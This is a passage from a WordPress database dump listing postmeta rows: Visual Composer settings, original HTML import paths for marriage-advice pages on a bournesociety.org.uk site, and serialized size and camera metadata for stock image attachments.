s:10:\"vc_grid_id\";a:0:{}}'),(133,36,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/7-dumb-things-to-do-about-your-sexless-marriage.html'),(134,37,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(135,37,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/a-guide-to-divorce-in-england-and-wales.html'),(136,38,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(137,38,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/a-healthy-happy-marriage-takes-work.html'),(138,39,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(139,39,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/a-peaceful-place-in-the-storm-how-to-stay-calm-when-life-isnt.html'),(140,40,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(141,40,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/a-subservient-marriage-can-it-work.html'),(142,41,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(143,41,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/are-cell-phones-to-blame-for-marital-misconduct.html'),(144,42,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(145,42,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/are-money-problems-pulling-your-marriage-apart.html'),(146,43,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(147,43,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/are-you-considering-marriage-counselling-for-your-marriage-problems.html'),(148,44,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(149,44,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/are-you-drifting-apart-from-your-spouse.html'),(150,45,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(151,45,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/are-you-in-a-sexless-loveless-marriage.html'),(152,46,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(153,46,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/are-you-viewing-marriage-as-a-financial-liability.html'),(154,47,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(155,47,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/can-a-marriage-separation-ever-save-a-marriage.html'),(156,48,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(157,48,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/can-you-overcome-an-affair.html'),(158,49,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(159,49,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/can-you-save-a-marriage-when-it-seems-impossible.html'),(160,50,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(161,50,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/catch-a-cheating-spouse-tips.html'),(162,51,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(163,51,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/cheating-spouses-cant-hide-their-extramarital-affairs-from-the-truth.html'),(164,52,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(165,52,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/co-dependent-marriages-are-not-healthy.html'),(166,53,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(167,53,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/communication-breakdown.html'),(168,54,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(169,54,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/communication-listening-from-love.html'),(170,55,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(171,55,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/communication-problems-is-silence-really-golden.html'),(172,56,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(173,56,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/control-issues-that-cause-marriage-problems.html'),(174,57,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(175,57,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/did-you-hear-what-i-just-said-how-to-really-listen-to-your-spouse.html'),(176,58,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(177,58,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/different-ways-men-express-their-love.html'),(178,59,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(179,59,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/discover-if-your-husband-or-wife-is-cheating-on-you.html'),(180,60,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(181,60,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/divorce-children.html'),(182,61,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(183,61,'URL_before_HTML_Import','/var/www/bournesociety.org.uk/html/site/your-marriage-is-not-over-until-youve-tried-everything-to-save-it.html'),(186,63,'_wp_attached_file','2017/10/tool-belt.jpg'),(187,63,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:638;s:4:\"file\";s:21:\"2017/10/tool-belt.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"tool-belt-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"tool-belt-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"tool-belt-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(188,64,'_wp_attached_file','2017/10/tools.jpg'),(189,64,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:17:\"2017/10/tools.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"tools-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"tools-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"tools-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(190,65,'_wp_attached_file','2017/10/top-of-beer.jpg'),(191,65,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:635;s:4:\"file\";s:23:\"2017/10/top-of-beer.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"top-of-beer-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"top-of-beer-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"top-of-beer-768x508.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:508;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(192,66,'_wp_attached_file','2017/10/top-of-rail.jpg'),(193,66,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:23:\"2017/10/top-of-rail.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"top-of-rail-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"top-of-rail-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"top-of-rail-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"13\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:4:\"X-T1\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(194,67,'_wp_attached_file','2017/10/torch.jpg'),(195,67,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:635;s:4:\"file\";s:17:\"2017/10/torch.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"torch-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"torch-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"torch-768x508.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:508;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(196,68,'_wp_attached_file','2017/10/tourist-attraction.jpg'),(197,68,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:30:\"2017/10/tourist-attraction.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"tourist-attraction-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"tourist-attraction-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"tourist-attraction-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"ILCE-7\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"55\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(198,69,'_wp_attached_file','2017/10/tower-bridge.jpg'),(199,69,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:24:\"2017/10/tower-bridge.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"tower-bridge-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"tower-bridge-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"tower-bridge-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(200,70,'_wp_attached_file','2017/10/towergate-logo.png'),(201,70,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:202;s:6:\"height\";i:62;s:4:\"file\";s:26:\"2017/10/towergate-logo.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"towergate-logo-150x62.png\";s:5:\"width\";i:150;s:6:\"height\";i:62;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(202,71,'_wp_attached_file','2017/10/tracing.jpg'),(203,71,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:720;s:4:\"file\";s:19:\"2017/10/tracing.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"tracing-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"tracing-300x232.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:232;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"tracing-768x595.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:595;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(204,72,'_wp_attached_file','2017/10/trade-business.jpg'),(205,72,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:26:\"2017/10/trade-business.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"trade-business-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"trade-business-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"trade-business-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:4:\"E-M1\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"12\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:6:\"0.0005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(206,73,'_wp_attached_file','2017/10/tradesmen.jpg'),(207,73,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:637;s:4:\"file\";s:21:\"2017/10/tradesmen.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"tradesmen-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"tradesmen-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"tradesmen-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(208,74,'_wp_attached_file','2017/10/traditonal-phone.jpg'),(209,74,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:28:\"2017/10/traditonal-phone.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"traditonal-phone-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"traditonal-phone-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"traditonal-phone-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(210,75,'_wp_attached_file','2017/10/traffic-camera.jpg'),(211,75,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:26:\"2017/10/traffic-camera.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"traffic-camera-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"traffic-camera-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"traffic-camera-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:15:\"Canon EOS 1200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"37\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(212,76,'_wp_attached_file','2017/10/traffic-graphs.jpg'),(213,76,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:26:\"2017/10/traffic-graphs.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"traffic-graphs-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"traffic-graphs-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"traffic-graphs-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D3100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"32\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:17:\"0.066666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(214,77,'_wp_attached_file','2017/10/traffic-on-phone.jpg'),(215,77,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:637;s:4:\"file\";s:28:\"2017/10/traffic-on-phone.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"traffic-on-phone-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"traffic-on-phone-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"traffic-on-phone-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(216,78,'_wp_attached_file','2017/10/traffic-sources.jpg'),(217,78,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:639;s:4:\"file\";s:27:\"2017/10/traffic-sources.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"traffic-sources-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"traffic-sources-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"traffic-sources-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D750\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"155\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:17:\"0.066666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(218,79,'_wp_attached_file','2017/10/traffic.jpg'),(219,79,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:19:\"2017/10/traffic.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"traffic-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"traffic-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"traffic-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(220,80,'_wp_attached_file','2017/10/train-advert.jpg'),(221,80,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:24:\"2017/10/train-advert.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"train-advert-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"train-advert-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"train-advert-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(222,81,'_wp_attached_file','2017/10/train-floor.jpg'),(223,81,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:639;s:4:\"file\";s:23:\"2017/10/train-floor.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"trai